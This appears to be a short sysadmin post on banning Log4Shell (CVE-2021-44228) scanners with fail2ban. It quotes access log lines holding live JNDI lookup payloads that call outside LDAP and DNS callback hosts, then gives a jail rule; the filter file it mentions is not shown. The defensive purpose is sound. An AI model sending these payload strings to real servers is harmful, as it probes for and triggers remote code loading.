Updated with a more aggressive regex, but you should check your own logs for false positives first. See my gist comment for more details.

Starting to get loads of unwanted CVE-2021-44228 (regardless of whether you use log4j or not) spam in your access logs?

194.163.45.31 - - [12/Dec/2021:23:19:29 +0000] "GET / HTTP/1.1" 301 169 "${jndi:ldap://c6r7tpm6dv1ojktuptjgcg5e8yybhnewc.interactsh.com/a}" "${jndi:ldap://c6r7tpm6dv1ojktuptjgcg5e8yybhnewk.interactsh.com/a}" geo="DE" rt=0.000 uct=0 uht=0 urt=0
45.83.66.48 - - [13/Dec/2021:02:37:56 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 5199 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}" geo="DE" rt=0.124 uct=0.000 uht=0.124 urt=0.124
45.83.64.110 - - [13/Dec/2021:03:06:20 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 404 5200 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}" geo="DE" rt=0.105 uct=0.000 uht=0.104 urt=0.104
223.178.213.192 - - [13/Dec/2021:10:20:32 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net%2Fa%7D HTTP/1.1" 301 169 "${jndi:ldap://926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net/a}" "${jndi:ldap://926.4ejrb8l7s5j2ik7h548o6et47vdl1a.burpcollaborator.net/a}" rt=0.000 uct=0 uht=0 urt=0

Add this rule to your /etc/fail2ban/jail.local:

[log4j-jndi]
maxretry = 1
enabled = true
port = 80,443
logpath = /path/to/your/*access.log

and save this log4j-jndi.conf file to your /etc/fail2ban/filter.d directory as /etc/fail2ban/filter.d/log4j-jndi.conf:

And then they’ll be banned on their first try.

Buy me a coffee if you found this useful.